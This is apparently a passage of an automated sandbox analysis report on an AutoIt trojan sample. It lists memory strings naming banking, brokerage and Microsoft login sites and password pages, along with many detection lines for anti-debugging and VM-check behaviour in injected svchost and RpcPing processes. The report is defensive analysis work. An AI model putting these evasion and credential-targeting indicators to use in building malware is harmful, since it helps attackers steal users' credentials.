Source: 45570IH2.9.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DUipWAeQLm.exe, 0000000A.00000002.3338852001.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
Source: 45570IH2.9.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: firefox.exe, 0000000B.00000002.3126320701.000001E336EFC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 45570IH2.9.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 45570IH2.9.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 45570IH2.9.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: 45570IH2.9.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdVMware20,11696
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rs - HKVMware20,F
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11
Source: 45570IH2.9.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zure.comVMware20
Source: 45570IH2.9.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 45570IH2.9.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 45570IH2.9.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: 45570IH2.9.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ropeVMware20,116,
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: 45570IH2.9.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rd.comVMware20,1z
Source: 45570IH2.9.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 45570IH2.9.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 45570IH2.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansaction PasswordVMware
Source: 45570IH2.9.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 45570IH2.9.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E rdtsc 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417CC3 LdrLoadDll, 2_2_00417CC3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007C41FD BlockInput, 0_2_007C41FD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00753B4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00785CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00785CCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress, 0_2_007CC304
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_036C3500 mov eax, dword ptr fs:[00000030h] 0_2_036C3500
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_036C34A0 mov eax, dword ptr fs:[00000030h] 0_2_036C34A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_036C1E70 mov eax, dword ptr fs:[00000030h] 0_2_036C1E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03CEC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] 2_2_03C383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03CB63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03CDE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03CD43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] 2_2_03C403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h] 2_2_03C663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] 2_2_03C2E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] 2_2_03C5438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] 2_2_03C28397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] 2_2_03CB2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] 2_2_03CB035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h] 2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03CD8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h] 2_2_03D0634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h] 2_2_03CD437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h] 2_2_03C6A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03C2C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h] 2_2_03C50310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h] 2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h] 2_2_03D08324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03C3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h] 2_2_03D062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h] 2_2_03C402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h] 2_2_03C6E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h] 2_2_03CB0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03CC62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h] 2_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03CB8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h] 2_2_03D0625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h] 2_2_03C2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h] 2_2_03C36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h] 2_2_03CEA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h] 2_2_03C34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h] 2_2_03C2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h] 2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h] 2_2_03C2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 2_2_03CF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03CAE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h] 2_2_03D061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h] 2_2_03C601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h] 2_2_03C70185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h] 2_2_03CEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h] 2_2_03CD4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h] 2_2_03CB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h] 2_2_03C2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h] 2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h] 2_2_03CC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h] 2_2_03C2C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h] 2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h] 2_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h] 2_2_03C36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h] 2_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04164 mov eax, dword ptr fs:[00000030h] 2_2_03D04164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h] 2_2_03CDE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h] 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h] 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h] 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h] 2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h] 2_2_03CF0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h] 2_2_03C60124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h] 2_2_03CB20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_03C2A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h] 2_2_03C380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h] 2_2_03CB60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_03C2C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h] 2_2_03C720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h] 2_2_03C3208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C280A0 mov eax, dword ptr fs:[00000030h] 2_2_03C280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h] 2_2_03CC80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h] 2_2_03CF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_03CF60B8
